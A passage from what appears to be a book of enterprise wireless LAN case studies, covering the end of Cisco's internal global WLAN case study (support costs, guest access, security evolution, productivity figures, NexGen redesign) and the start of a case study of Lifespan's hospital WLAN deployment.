ongoing network and infrastructure support. The WLAN subteam is made up of engineers who
usually have several years of experience supporting the solution and, in many cases, were directly
involved in the original deployment and design. The IT WLAN network operations team has access
to the access points, switches, routers, AAA servers, and WLAN controllers that make up the
solution. This team also includes virtual members from the Cisco dedicated security organization
and hosting teams (responsible for the AAA and Active Directory servers).
Cases that are handled at this level are usually AP or controller configuration issues, service outage
problems, requests for enhanced coverage, and so on. Problems that the IT WLAN network
operations team cannot solve are escalated to Tier 3 support.
Tier 3: Cisco IT WLAN architecture team The IT WLAN architecture team is made up of several
senior design engineers and solutions architects. Members of this team designed the original
solution and have continued their work on evolutionary change and development over the past five
years. This team holds the most technical, business, security, and program management
experience on the Cisco solution.
Cases that are handled at this level are usually fundamental design or architecture issues, requests
for new services or capabilities, and new product or solution implementation. If a problem cannot
be handled at this level, it is usually a result of a product bug and is escalated to Tier 4 support.
This is a rare occurrence because most issues that are escalated this high relate to solution
development rather than bug fixes.
Tier 4: Technical Assistance Center (TAC) and Wireless Networking Business Unit
(WNBU) The TAC is the top level of support within Cisco and for Cisco customers . Cisco IT can
also escalate directly to the WNBU within Cisco. Only officially noted bugs are escalated to this
level.
A team of three and a half full time equivalent (FTE) staff makes up the Tier 2 IT WLAN network
operations staff. Note that this effort is spread over several people in several countries but that the
combined total is equivalent to 3.5 FTE.
A team of two and a half FTE makes up the Tier 3 IT WLAN architecture team. This includes the global
program manager responsible for enterprise wireless strategy and architecture.
Cost of Support
Cisco prices each GTRC support call at US$25 per call. This results in annualized cost of frontline Tier 1
support of US$318,900.
Cisco budgets US$120,000 per annum as the fully loaded cost of an FTE. This cost includes salary,
assets, workplace costs, business costs, and so on, and is not indicative of salary alone. This results in
annualized cost of second-line Tier 2 support of US$420,000.
Because of the nature of the Cisco business and the maintenance of a Tier 3 architecture team, Cisco
does not include these costs in the day-to-day annualized support costs. Cisco believes the maintenance
of a dedicated architecture team is not indicative of a typical enterprise because not all corporations are
based in the networking industry.
This results in a total annualized cost of support as reflected in Table 9-1 .
Frontline support
$318,900
Second-/ Third- line support
$420,000
Total annual support costs
$738,900
Annual support cost per user (50,000 users)
$14.77
Table 9-1. Cost of Support

Level of Support
Cost
Enhanced Services
Several enhanced services are available today, including support for wireless voice services and global
guest networking. The enhanced services are facilitated by the use of several SSIDs and wireless VLANs,
with differing security settings based upon the target devices. Figure 9-4 displays the various SSIDs
used by Cisco to provide enhanced services, such as wireless voice and guest WLAN networking. Two
production SSIDs are also used with different encryption methods: one with WPA and one with Cisco
TKIP. This ensures that older devices that cannot support WPA are still provided with an SSID that they
can use.
Figure 9-4. SSID Architecture
Wireless Voice Services

Wireless voice services are provided to Cisco employees by the use of the Cisco Wireless IP Phone 7920,
a key component of the Cisco AVVID Wireless Solution and Cisco IP Communicator, a Windows-based
Softphone application.
The Cisco Wireless IP Phone 7920 is a WiFi-based (802.11b) phone that offers employees the ability to
carry their extension with them as they move about Cisco premises. Many highly mobile users have
adopted this device because it allows them to keep abreast of their voice communication services, even
when away from their desk.
Cisco IP Communicator is similar in concept to the Cisco Wireless IP Phone 7920, but it uses a virtual
software-based IP phone that is set up and configured on the user's laptop. This allows users to access
their extension, regardless of location and even when outside of Cisco sites by the use of VPN
technology.
Wireless voice services are provided by a dedicated SSID and wireless VLAN, configured with support for
QoS (802.11e and WMM, or Wireless MultiMedia, protocols) and fast secure Layer 2 roaming (provided
by Cisco Centralized Key Management [CCKM]).
Wireless Guest Networking

Wireless Guest Networking services are provided by Cisco IT to enable visitors to access the Internet
while at Cisco sites. The solution is based upon a combination of the existing WLAN infrastructure, the
Cisco Building Broadband Services Manager (BBSM), and an internally developed web portal for
employee self-service access code generation.
All access points within the Cisco global network broadcast a guest networking SSID, which is configured
with open authentication and no encryption to ensure that any client device can associate. When a visitor
associates to the guest networking SSID and launches his browser, his HTTP session is automatically
routed to a welcome page and portal. The visitor must read and accept the Cisco acceptable use policy
and enter a preprovisioned access code. Upon validation, the visitor is then rerouted the Cisco
demilitarized zone (DMZ) via a GRE tunnel to protect the production network. Effectively, from the
guest's point of view, he is immediately provided with seamless Internet access, and he has no
awareness of the intervening and transporting network between his location and the DMZ.
Note
DMZ is originally a military term denoting a semi-safe area around a base or border where
military (and therefore enemy) activity is controlled. In the networking world, this term was
adopted to describe the area of an enterprise network that lies between the Internet and the
internal enterprise network. It is where the enterprise typically places its security apparatus
and gateways to the Internet. A firewall or a router usually protects this zone.
GRE is a tunneling protocol developed by Cisco Systems that can encapsulate a wide variety of
protocol packet types inside IP tunnels.
Access codes are required to satisfy the Cisco requirement for auditing and IT forensics. Were a visitor
to undertake illegal or unfriendly activity, the behavior could be tracked back to a particular IP address,
which in turn is associated with a particular access code. Because each access code is generated on an
as-needed basis and associated with a particular visitor, Cisco security and legal departments can
ascertain who was using a particular IP address at any particular time.
Access control, and the use of access codes, is provided by the BBSM. However, to avoid unnecessary
administrative overhead, Cisco IT developed an internal tool to allow Cisco users and staff to generate
access codes for their own visitors. Effectively, Cisco has empowered its own staff with the ability to
create access codes when they expect visitors. This removes unnecessary support burden from IT and
administrative staff.
Access codes are therefore available for creation at the internal intranet page hotspot.cisco.com. Any
Cisco employee can access this page and, after authenticating oneself as a Cisco employee, generate
one or more access codes. Figure 9-5 illustrates how a Cisco staff member can generate the access
codes, which are in turn provisioned on the BBSM, which in turn acts as an access portal to the Internet
for the guest.
Figure 9-5. Cisco Guest Wireless Networking Solution

Security
In 2000, during the initial deployment, the Cisco security architecture was based upon a combination of
Cisco LEAP, for authentication, and Cisco Key Integrity Protocol (CKIP), for data integrity (encryption).
However, as the industry, solutions, and threats evolved, Cisco further strengthened the security of its
internal WLAN.
In 2005, Cisco replaced LEAP with Extensible Authentication Protocol-Flexible Authentication via Secure
Tunneling (EAP-FAST). EAP-FAST further secures authentication by ensuring that all user credentials and
passwords are passed from the client to the authenticators via a strongly encrypted tunnel. For more
information about EAP-FAST, visit
http://www.cisco.com/en/US/netsol/ns339/ns395/ns176/ns178/netqa09186a00802030dc.html or visit
Cisco.com and search for the keyword EAP-FAST.
Additionally, and in line with Cisco IT's policy of adopting open, cross-industry standards (where
applicable and where Cisco does not provide enhanced value-added alternatives), WiFi Protected Access
(WPA) was adopted as the encryption protocol for data integrity.
The Wireless LAN Solution Engine (WLSE) provides radio-based rogue AP detection and has been
integrated into Cisco IT's help desk case generation system. Additionally, an internally developed tool is
used for network-based (that is, wired) scanning. This tool regularly scans Class C IP subnets, searching
for devices that satisfy certain criteria and may be rogue access points. Based upon so-called "TCP port
fingerprinting" and other holistic logic, the tool compares all devices it detects with the database of Cisco
IT installed access points. Where a device is not already listed as a Cisco IT device, it is flagged as
"interesting," and a case is automatically generated. This case, in turn, is routed to the Tier 2 support
team for investigation.

To facilitate the deployment, Cisco IT assembled a global program management team under the
direction of a global program manager. Representatives were selected from each of the four regions
worldwide: Americas, APAC (Asia Pacific), EMEA (Europe, Middle East, Africa), and SJ (San Jose
Headquarters).
Responsibility for deployment within each region was delegated to a regional project manager and local
team. Region-specific project managers determined and managed an implementation schedule within
their own region. Local teams communicated progress at a weekly global deployment meeting. Several
sites were deployed concurrently across and within regions. Serial installation by one global team might
have taken years. Instead, almost all sites were deployed within a four-month timeframe in 2000, with
the exception of India, which was delayed because of local regulatory issues with 802.11 standards.
The global program management team recognized that using Cisco employees exclusively to perform
WLAN installation tasks was not the most cost-effective use of resources. Instead, where possible,
vendors were hired for the bulk of the work. These vendors had to meet a minimum set of requirements
established by the global program management team. The local contractors had to have a previous
trusted relationship with Cisco and had to have wireless certified engineers. An emphasis on competitive
bidding helped to minimize capital investment. Each local team selected their contractors based on their
familiarity with the local market.
Site Survey
The global program management team established a guideline for the deployment process to be followed
worldwide. The first step in deployment was the site survey. A formal and well-defined site survey was
undertaken at each site, or on large campuses with several buildings with identical floorplans, at one
building only, with the same results being applied to each identical building.
In many locations, trusted vendors performed the site surveys, while in some locations, such as San
Jose, Cisco IT employees undertook the process themselves.
Cabling
After the site survey was complete, local contractors (different from the site survey firm) installed the
cabling and physically placed, secured, and connected the Cisco Aironet access points. Each access point
was provided with two cables: one for data connectivity and one for console access.

After the access points were cabled and powered (via PoE), they were configured. Before distribution to
each site, the access points were preconfigured with a "generic" configuration that allowed Cisco IT to
connect and push the final production configuration. This was known as the staging phase, and it
allowed Cisco IT to preconfigure and update firmware before shipping equipment to each site. This
configuration was in compliance with the global design specifications established by the architecture
team. Most critical were the IP address, channel assignment, and transmit power settings. Using generic
and standardized access-point configurations helped to ensure consistent access-point settings across
the entire deployment, simplified troubleshooting, and provided Cisco IT with greater control of
individual access points.
Testing
Following configuration, the same contractor who performed the site surveys returned to conduct postinstallation acceptance tests in each building. Dummy user accounts with limited access rights were
provided, which enabled the contractors to test basic WLAN authentication and services. The globally
consistent and clearly defined acceptance tests included the ability to roam from access point to access
point and transfer a file at a minimum designated speed. Tests also helped to ensure the correct overlap
between access point cells and verified that there were no dead spots.
Distribution of Wireless Network Cards and Instructions

At the time of the global WLAN deployment, distribution of Cisco Aironet 802.11b WLAN client adapters
(wireless cards) presented a significant challenge. Cisco had to smoothly distribute more than 35,000
wireless cards in a timely and controlled manner across 400 sites in approximately 100 countries. Not
only did the cards represent a significant percentage of the total program cost, but Cisco IT also needed
to update each card with the latest firmware before delivering it to each user. Furthermore, it was
important that the cards were not distributed to users until their sites were completed and had
successfully passed the post-installation acceptance test.
In most locations, the task of inventorying, verifying firmware level, and distributing cards and operating
instructions to users was performed during the staging phase and assigned to the same vendor that
performed acceptance tests. Cards were shipped to the local vendor's distribution center where the
correct firmware level would be verified or updated as appropriate. When vendors carried out the postinstallation acceptance tests, they distributed the cards to local users, along with user instructions, FAQs
(Frequently Asked Questions), and introductory collateral from Cisco IT. Setting user expectations and
providing comprehensive information were critical to minimizing support calls.
Today, Cisco uses both Cisco Aironet access points and Cisco compatible client devices in its network.
Using these devices provides Cisco employees with a variety of licensed Cisco infrastructure innovations
and enhancements for its WLANs, including advanced enterprise-class security, extended air RF
management, and enhanced interoperability.

Cisco maintains a full-time global solutions program manager for enterprise wireless strategy and
architecture. This individual is responsible for leading the IT WLAN architecture team (which also
provides Tier 3 support where necessary). The team meets on a weekly basis and discusses ongoing
solutions development and enhancement, operational issues, and any current projects in the wireless
technology domain.
Business Benefits of the Solution

Cisco IT believes that the global WLAN solution provides positive productivity benefits in excess of
US$50M per annum. Internal Cisco IT studies show average productive time savings of over 30 minutes
per day. However, to ensure a more conservative approach, Cisco has calculated the business value of
the WLAN on the assumption of 50 percent of users saving only 10 minutes per day.
Cisco Systems, Inc. commissioned an independent study on WLAN benefits in 2003. Based on a survey
of over 300 U.S. organizations with more than 100 employees, it was found that WLANs typically provide
average daily time savings (and therefore productivity) of 90 minutes. This in turn is equivalent to
US$14,000 per employee, per annum[1]
Rather than adopting these figures (which would have resulted in projected savings of several hundred
million dollars when considering over 38,000 regular employees), Cisco IT took a considerably more
conservative and financially prudent approach.
First, Cisco calculated the cost of employee time, as follows:
230 work days per year
96,600 work minutes per year (7 hours per day)
Average cost of $120,000 per employee per year (salary, workplace resources costs, and so on)
120,000 / 96,600 = 1.2422
Average cost per work minute: $1.24 / minute
Cisco IT then calculated the benefits that would result if each employee were to save 10 minutes per
day. This resulted in a figure of over 100 million dollars:
10 minutes saved * $1.24 * 230 work days = $2,852 per employee
38,000 employees, productivity improvement =US$108,376,000
This figure is, of course, unreliable. Cisco IT therefore undertook a normalization process and reduced
the projected time savings. To ensure financial prudence, Cisco IT revised their estimates downward.
They now assume only 50 percent of their daily WLAN users saved and used 10 minutes of productive
time per day:
10 minutes saved * $1.24 * 230 work days = $2,852 per employee
19,000 employees * 2,852 = US$54,188,000
Experience, user reports, and observed behavior show that these figures err on the side of caution.
However, even with this statistically conservative and financially prudent approach, Cisco IT has shown
that the global WLAN solution not only paid for itself within six months of deployment but also has been
positively affecting the Cisco bottom line to the tune of tens of millions of dollars for the past five years.
Cisco IT expects this trend to continue as users' reliance on the WLAN increases and additionally
enhanced services are added to the solution.

Cisco IT is currently undertaking a major upgrade of the global WLAN. As the business has come to
realize the benefit of wireless connectivity, the WLAN is being redesigned from the bottom up, adopting
a proactive business value philosophy rather than a simple technology deployment approach. The team
has been tasked to tackle the wireless LAN in a holistic manner, taking into account not only new
products (such as the Cisco WLAN controllers and LWAPP access points), but also concepts such as fully
integrated security with the Cisco self-defending network security strategy, a converged management
solution, improved stability, and resilience in addition to data and voice capacity, outdoor coverage to
ensure seamless roaming on campus sites, and a raft of additional features, enhancements, and
evolutionary development.
The number of access points will be approximately doubled, providing a 100 percent improvement in
user to AP ratio, from the current 25:1 ratio to approximately 14:1. This is essential for robust wireless
voice services, increased granularity in wireless rogue AP detection and Intrusion Detection Systems,
and greater wireless traffic loadall features and characteristics of Cisco's internal WLAN today.
This section describes other changes introduced by Cisco IT's NexGen WLAN:
Modular architecture
Enhanced security
Location-based services
Outdoor wireless
Modular Architecture: Centralized and Autonomous APs

Because of the large number of Cisco sites and their varying sizes (from large multibuilding campuses
with thousands of users to small, shared-tenancy sales offices with five or fewer staff), the Cisco WLAN
upgrade plan includes a combination of the Cisco centralized WLAN solution (based on LWAPP access
points and WLAN controllers) for large- and medium-sized sites, along with the Cisco distributed WLAN
solution (based on intelligent, IOS-based access points) for small and very small sites where local
controllers are uneconomical. The flexibility of this solution allows Cisco to tailor its internal global
solution to all kinds of sites, from campus sites with thousands of staff to small, regional sales offices
with five or fewer users.
Figure 9-6 provides a snapshot of the NexGen WLAN architecture. Large campus buildings are fitted with
LWAPP access points. Buildings are logically grouped into clusters, and dual redundant WLAN controllers
are used to manage the access points in each cluster. Wireless coverage is provided outside using Cisco
outdoor mesh access points. The outdoor mesh network is provided between buildings on large campus
sites to allow seamless roaming from building to building and to support enhanced wireless voice
services. Medium to large remote offices are also fitted with LWAPP access points, and dual redundant
WLAN controller appliances are installed locally. For small offices, IOS access points are used. Finally,
WLAN management is provided by both the WCS and Wireless LAN Solution Engine (WLSE) that are
centrally located at regional data centers.
Figure 9-6. High-Level Overview of the Cisco Internal NexGen WLAN Project
Enhanced Security
The security framework for the Cisco internal NexGen WLAN will be based on the recently ratified
802.11i protocol. Authentication will continue to be provided by EAP-FAST, a tunneled authentication
protocol that protects authentication exchanges in a strongly encrypted tunnel. Data integrity will be
provided by WPA and WiFi Protected Access 2 (WPA2), with the incremental introduction of Advanced
Encryption Standard (AES) capable devices.
The integrated Wireless Intrusion Detection System will be used to proactively monitor, detect, and
isolate wireless security threats, including rogue access points and well-known wireless hacking attacks.
The latter is a fundamental feature of the Cisco centralized WLAN solution, itself part of the Cisco Unified
Wireless Network solutions family. To learn more, visit
http://www.cisco.com/en/US/products/ps6306/prod_brochure09186a0080184925.html or go to
Cisco.com and search for the keyphrase Cisco Unified Wireless Network.
Finally, third-party scanning utilities will be used for wired network scanning; this is especially important
as a tool to reduce false positives and to assist with rogue AP detection in smaller sites and "air gapped"
locations, where there are fewer access points to undertake active over-the-air scanning.
Location-Based Services
The Cisco WLAN Location Appliance will provide robust location-based services (LBS) such as asset
tracking to assist in E911 applications. Combined with the use of 802.11-based wireless asset tags, this
will allow Cisco IT to identify, locate, and track high-value assets in real time, down to a particular room
and usually within five meters of accuracy.
Outdoor Wireless
Cisco plans to extend the enterprise WLAN such that it will provide coverage outdoor between buildings
in its large campus sites. This coverage will be achieved with the use of the Cisco new Aironet 1510
outdoor mesh access point. The use of mesh technology will avoid the necessity of cabling each outdoor
access point and will ensure seamless self-configuration and optimization.
The outdoor coverage will be a logical extension of the indoor WLAN and will be protected with the same
level of robust security features.
Outdoor coverage will extend the capabilities of the enterprise WLAN and also ensure seamless, buildingto-building roaming, which is especially important for wireless voice features.
Summary
Cisco Systems, Inc. deployed a global WLAN in 2000, and within 18 months, 27 percent of their staff
were using it as their primary access medium. Ubiquitous coverage and comprehensive entitlement
dramatically increased the uptake of the solution. Careful project and program management were
adopted during the deployment, and the global network was deployed in 400 sites in four months.
Security has continued to evolve in line with industry trends. Cisco believes the global WLAN has
resulted in real productivity benefits in the tens of millions of dollars. Enhanced services such as wireless
voice and guest WLAN networking have added to the success of the solution.
Cisco IT is undertaking a major global redesign of its solution in late 2005, and the NexGen WLAN will be
based on the Cisco integrated wireless network family, including the Cisco centralized WLAN solution for
large and medium sites and the Cisco distributed WLAN solution for small sites. Significant additional
enhanced services are being planned, including outdoor mesh wireless coverage, location-based services
for asset tracking, and significantly improved security with integrated wireless intrusion detection
services.
The Cisco solution continues to evolve and provide real-world, tangible, everyday benefits to every Cisco
employee in every office around the globe.
Endnotes
1. Cisco Systems, Inc. New Study Points to Substantial Financial Returns from Broad-Based Wireless
LAN Deployments. 2003. http://newsroom.cisco.com/dlls/hd_111203b.html.
Chapter 10. Healthcare Case Study
In 1994, Lifespan evolved as the result of a merger of Rhode Island Hospital and Miriam Hospital, the
two largest acute care facilities in Rhode Island and Southern New England, partnered to form Lifespan.
The reach of Lifespan's healthcare practice extends to Hasbro Children's Hospital, Emma Pendleton
Bradley Hospital, Newport Hospital, and hundreds of foundations and clinics. Lifespan is a not-for-profit
healthcare institution supporting more than 2,400 physicians. Lifespan's Rhode Island Hospital, Miriam
Hospital, and Emma Pendleton Bradley Hospital form the Academic Medical Center and serve as the
teaching arm of Brown Medical School for medical education and research.
This case study is the result of an interview with David Hemendinger, chief technology officer. Mr.
Hemendinger holds responsibility for enterprise-wide systems infrastructure and new technology
integration. This includes ownership of Lifespan's vast wide-area networks, local-area networks, wireless
networks, data centers, helpdesk, telecommunications, system security, and all new technology
deployment for the healthcare corporation.
Business Model
As part of a well-thought-out strategic plan developed within Lifespan in 1996, wireless technology was
part of a strategic and tactical element to support the delivery of high-quality healthcare. This goal is
achieved by enabling mobility to clinical systems and providing point-of-care functions to physicians and
other clinicians anytime, anywhere.
Defining the Business Case

Hemendinger explained that to realize these goals, Lifespan directed its attention to giving healthcare
providers the ability to perform their duties by leveraging WLANs to make mobility a mainstay.
According to Hemendinger, "When you understand how physicians and clinicians work, you can then
provide a service which makes a difference at the point of care with the patient."
Hemendinger relates that over time, enhanced patient care through the use of mobility improved
efficiencies within the clinical process, which resulted in an "it's the right thing to do" model. In essence,
they reduced the traditional return on investment (ROI) and total cost of ownership (TCO) requirements
to something less significant in the decision-making process. "On paper this technology and its
deployment is expensive, but when you go onto the floors and watch the clinical staff utilizing these
capabilities to provide complete diagnosis and patient treatment, its cost is easily justified," says
Hemendinger.
Using this argument, Lifespan's Information Services executive management was able to sit with senior
leadership and affiliate boards of directors to explain a comprehensive, clinical system strategy and the
valuable role infrastructure would play. Wireless was a tactical element of the plan and would contribute
to the high adoption rate and use by the physician and clinician. Although it was costly, the benefits that
Lifespan gained revolved around a cultural change that positively affected the care of the patient.
The efficiencies centered on how the wireless network provides the foundation for immediate access to
clinical systems, speeding the delivery of care, standardizing care practices, reducing interface errors at
all points where they might otherwise be made, and saving on now-unnecessary transcription costs.
The Strategic Value

In healthcare, time is the difference between life and death. Keeping this in mind, Lifespan's strategic
plan is to take the critical healthcare information to the patient rather than requiring the physician or
clinician to seek out the information. Hemendinger further explains the change in philosophy that
provided the catalyst to deploy a pervasive computing environment within the continuum of care.
According to Hemendinger, "We made on a cultural shift. We deployed wireless not to reduce wire but to
give function; the wireless network has changed processes and spawned a revolution in attitudes and
culture within Lifespan hospitals. Originally conceived to support availability of data for physician order
entry [POM system] and clinical work, the wireless network has accomplished that and much more."
This principle has proven to be highly effective, supporting the cost justification based on a strategic
model (higher quality and more accurate treatment). Adopting this technology into the physicians' and
clinicians' workday was the foundation for acceptance and adoption within the clinical space. Information
is provided at the place and time it is needed. Healthcare professionals rely on the application resources
and pertinent data to make the best decisions possible.
Lifespan realized measurable and tangible benefits. The key benefit is through system use and adoption.
At Lifespan, the high adoption rate of its Computer Physician Order Management (CPOM) application
demonstrates this point. Launched across the WLAN two years ago, the compliance rate for Lifespan's
CPOM tool is greater than 90 percent. Conversely, the national healthcare average for adoption of similar
healthcare applications is only 8 percent.
For Lifespan to achieve these numbers, it had to develop their technology and application for mobile use
across all its enterprise WLANs.
Although harder to measure, two other benefits surfaced and improved at Lifespancustomer satisfaction
and risk mitigation. These byproducts came to fruition because of Lifespan's adoption of WLANs to
enable a mobile workforce. Customer satisfaction and risk mitigation cannot be overlooked in today's
healthcare environment.
Although the overall strategic technology plan was developed in 1997 with wireless in mind, the actual
wireless selection began mid-year 2000. The process included an extensive review of all WLAN providers
that existed at the time. Subsequently, the enterprise-wide deployment began in August 2001 and took
about six months.
One of the guiding principles to making the WLAN successful was the understanding that people in
healthcare cannot be tethered, lest they lose efficiency and time. The idea is to bring the computing
environment to the end user. If physicians and clinicians must search out systems, they will be less
inclined to use the applications as part of their daily work. This fact led to the other principles that would
challenge Lifespan. It had to change the culture.
The advancement of technology meant that devices, applications, and attitudes were changing. For a
physician to adopt the use of a laptop or tablet PCat the point of carethe design had to be friendly.
According to Hemendinger, "We had to have the technology and the application as comfortable to use as
a telephone."
The value was that as physicians used the technology, it reduced clinical errors and provided enhanced
decision support functions, immediate identification, and course of care.
The WLAN was built in phases with the intention of being deployed ubiquitously, the initial phase being
delivered to maximize coverage. Follow-on phases amended the original architecture to allow for higher
throughput and higher densities and to support functions of evolving technology such as voice and
video. The initial two phases were designed for patient data only. The scope of the deployment was
broken into two phases:
Phase 1 All clinical spaces (Intensive Care Units, medical space floors, emergency department,
etc.)
Phase 2 Operating rooms and administrative spaces
Now that the WLAN has been deployed, it covers over one million square feet of clinical space. This
coverage enables physicians to access patient information during rounds anywhere in the clinical space
on or across the campus. WLAN coverage extends to physicians' lounges, cafeterias, libraries, and
parking lots. This coverage allows physicians to access the network and the applications they need to
perform their job: Provide the best healthcare possible.
Over time, the need for additional bandwidth became evident to accommodate the addition of highconsumption applications. Although the original use for the WLAN focused on providing low-end data
access, diagnostic imaging and other advanced medical uses drove the bandwidth and density
(coverage) needs up. Moving forward, Lifespan will look to provide pervasive patient monitoring, patient
tracking, and VoIP capabilities. Figure 10-1 illustrates how support for additional locations and services
increased bandwidth and density needs. Each grouping represents the location, data type, and time
frame.
Figure 10-1. Locations and Services Directly Impact Bandwidth and Density
WLAN Design
Since the initial deployment, the WLAN design has gone through some major changes to adapt to the
needs outlined in the architecture. The first products deployed were the Cisco AP340 and AP350 series
access points. As expected, over time newer Cisco products emerged, in parity with the maturing WLAN
and WiFi standards. Lifespan has undergone numerous WLAN upgrades and now employs the Cisco
AP1200 series access points running 802.11a/b/g across the enterprise.
The WLAN grew over time from 350 to 500 APs and continues to grow as higher WLAN densities are
required. The WLAN now stretches from the clinical areas to operating rooms and administration spaces.
The density has also increased the access point count to accommodate the additional services provided
over the WLAN, such as location-based services and VoIP.
Lifespan also uses Cisco 1400 series bridges to give it flexibility and cost control in the campus metro.
These bridges act as both the primary and secondary building interconnections at many Lifespan
locations. The use of the bridge for MAN connectivity was a more economical solution than running
copper and fiber throughout the campus. Hemendinger said, "When you need to dig up roads to route
fiber and copper or manage long-term agreements with vendors for fiber connectivity, it becomes very
expensive to provide high-bandwidth connectivity; the wireless bridges have allowed us to provide better
service at lower cost."
Guest Networking
Lifespan is one of the most progressive and true early adopters of WLANs. One area of note is that they
provide full wireless guest access for patients in their rooms at Hasbro Children's Hospital. More
important, at the time of this writing, they do not charge for this service.
Imagine being able to send pictures of your new baby to relatives, updating people on your family's
condition, or passing the idle time you have in the hospital room by surfing the Internet.
Hemendinger recalled a quote recorded from a patient's family member that demonstrates the value of
this service:
"During the course of our son's multiyear treatments, we had numerous overnights and several
lengthy stays. Having direct high-speed wireless access to the Internet from my son's room was
critical in supporting many aspects of his treatment program. In addition to my son's usage, I was
able to spend quality time with him and, at the same time, keep up with my ongoing work and email. This enabled me to limit the number of vacation days needed, given that I was still able to be
productive. Without the wireless access, I would have been using extensive vacation time and/or
had to leave my son alone at the hospital during working hours. Simply stated, it made the whole
experience much easier for all of us. A must for all hospital stays."
Technically, the setup is simple. Guests are provisioned onto a separate part of the network with open
security. Lifespan provides this as a best-effort service, and as long as your wireless device software
supports profiles or autoconfiguration, patients can discover the Service Set Identifier (SSID) and off
they go. Additionally, some level of proxy and firewalling is provided.
RF and Interference
Interference is a true nuisance in the wireless world. In the medical arena, the U.S. Federal
Communications Commission (FCC) and U.S. Food and Drug Administration (FDA) have produced
frequency standards that all medical devices must adhere. Medical frequency bands are confined to 900
MHz and 1.4 GHz. Lifespan has performed frequency analysis and frequency interference mapping in
many locations throughout the enterprise. This data provides network engineers with optimal antenna
placement to minimize interference.
Disaster Recovery
The WLAN is designed to be highly available and is correspondingly treated as a primary method of
access at Lifespan. However, individual APs within the enterprise WLAN might go down sometimes.
During a simple outage where only a single AP is down, the WLAN is designed to allow users to
seamlessly access the network at another AP.
"We also designed the WLAN in such a way that if you lose one or two APs on a floor, most users would
never even know it. There might be slight performance degradation, but for [the] most part, users would
not notice it," says Hemendinger.
In the case of a catastrophic event resulting in complete failure of the WLAN, patient care is not
compromised and neither is the access to critical clinical data. To support this principle, Lifespan did not
remove the wired infrastructure that allows some clinical systems to be used over the wired network. As
a tertiary precaution, the PDAs that physicians and clinicians carry also act as a backup during a
complete network failure because some critical data is stored locally on the devices.
Note
According to law in Rhode Island, physicians or clinicians must record all patient information or
care results destined for the medical record on a paper chart.
Network Management
Management of the access point infrastructure has been satisfactory. On the other hand, software for
client cards and adapters via automatic push remains problematic to Lifespan's IT department. In
practice, the department uses an 80/ 20 rule, where the aim is to manage 80 percent of the clients using
an automated method for software management. Hemendinger explains that if need be, it can settle for
a manual intervention for up to 20 percent of the clients: "If I can centrally push and capture 80 percent,
then I can handle hitting the streets for the remaining 20 percent."
The mix of hardware11,000 client devicesin the Lifespan network puts client software management on
the forefront of issues that concern the company today. For Hemendinger and his IT teams, pushing
software to the client is significantly complex. "Push and end up with half the environment down or not. I
must mitigate risk to the best of our ability; we thoroughly test all updates. I must have staff that is
dedicated to crossing Ts and dotting Is prior to push; we are talking critical life-saving clinical systems,"
said Hemendinger.
The crux of Lifespan's client management problems lies in the fact that it supports a variety of WLAN
clients. Even knowing that it would be better to support only a limited number of devices and clients,
Hemendinger must put his customer first. The device must fit into the physician's daily work style as
opposed to having the physician learn to work with the device. This point reemphasizes that ease of use
drives high adoption. Today you will find several devices used in the enterprise:
Vocera for VoIP
Carts on wheels 700+
Tablet PCs
WLAN-enabled laptops
Thousands of PDAs
To alleviate many possible problems, there is a current standard. All clients currently use Cisco PCMCIA
or PCI bus adaptors. Going forward, Lifespan's standard includes using Cisco Compatible Extension
(CCX) products in the WLAN enterprise.
Note
The Cisco Compatible Extension (CCX) program is an initiative to help to ensure that client
device or silicon manufactures are interoperable with a Cisco WLAN infrastructure and can take
advantage of Cisco innovations for enhanced security, mobility, quality of service (QoS), and
network management. To learn more, visit
http://www.cisco.com/en/US/partners/pr46/pr147/partners_pgm_concept_home.html.
Lifespan employs several automated products to provide robust client software push. Some tools include
off-the-shelf products like EPO by Network Associates. However, like many early adopters, Lifespan has
developed many tools (scripts) in-house.
Security
Lifespan is a Cisco SAFE Blueprint adopter. In its security solution, you will find the use of Cisco-EAP
(LEAP) and Cisco Access Control Server (ACS), which are standard recommendations for a robust and
secure WLAN infrastructure. More information about Cisco SAFE Blueprint can be found at
http://www.cisco.com/go/safe.
Looking beyond the authentication and encryption of APs and clientsas part of the security
architectureLifespan must contend with device-level security for the variety of devices they support.
Device-level security is a great concern because most are small handheld devices (PDAs), many of which
can have more than one user.
Physical security of the device, although a concern, is not as important as maintaining the integrity and
confidentiality of the data on the device. Device-level security stemmed from the need to protect
sensitive data, as required by the Health Insurance Portability and Accountability Act (HIPAA) and
SarbanesOxley Act (SOX), from being accessed by unauthorized personnel. To combat this problem,
third-party software was installed in the PDA devices that would essentially eradicate the data after three
failed login attempts.
Note
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) amended the Internal
Revenue Code of 1986 to improve portability and continuity of health insurance coverage in the
group and individual markets; to combat waste, fraud, and abuse in health insurance and
healthcare delivery; to promote the use of medical savings accounts; to improve access to
long-term care services and coverage; to simplify the administration of health insurance; and
for other purposes. To learn more, visit http://www.cms.hhs.gov/hipaa/.
The Sarbanes-Oxley Act of 2002 (SOX) mandated several reforms to enhance corporate
responsibility, enhance financial disclosures, and combat corporate and accounting fraud. It
created the "Public Company Accounting Oversight Board," also known as the PCAOB, to
oversee the activities of the auditing profession. A PDF download of SOX can be found at
http://www.sec.gov/about/laws/soa2002.pdf.
Project Management and Process

Lifespan chose to handle all project management and implementation in-house. The deployment
included all facilities managed through a central office. The technical portion of the deployment was also
centrally managed through its NOC for provisioning. All needs for information such as floor plans and
labor, AP placement, and Power over Ethernet were handled separately through the facilities
organization.

At Lifespan, the enterprise WLAN deployment involved everyone. A comprehensive team included
individuals from networking, applications, helpdesk, and the physicians and clinicians who use it.
Adoption was driven by getting buy-in from everyone at Lifespan.
Training on applications and devices used on the WLAN was relatively easy. Access to all clinical data
was provided through a web portal called Lifelinks. This application (portal) is the same on all systems,
wired or wireless. The WLAN-enabled device took little time to learn because it was familiar to the users.
In the end, the one aspect of training that requires ongoing education is ensuring that people keep
point-of-care devices charged.
Site Survey
The site surveys were handled through a combination of internal staff supplemented by third-party
contractors for frequency analysis.
Having a complex family of devices that operate in multiple frequency bands is a constant concern
regarding interference. This concern mandates the use of a complex and thorough site surveyin
operating rooms, a complete frequency analysis was done while they were in full operation to map
frequency interference under real-time conditions. This helped to create a complete picture of what
interference (RF patterns) existed. In the end, when conducting a proper site survey is important to
avoid having to set up separate rules or having "one-off" exemptions and to be able to function
efficiently.
Additional WLAN changes underway at Lifespan now revolve around the need for higher densities. These
changes when combined with the internal site survey and AP placement selection will enhance Lifespan's
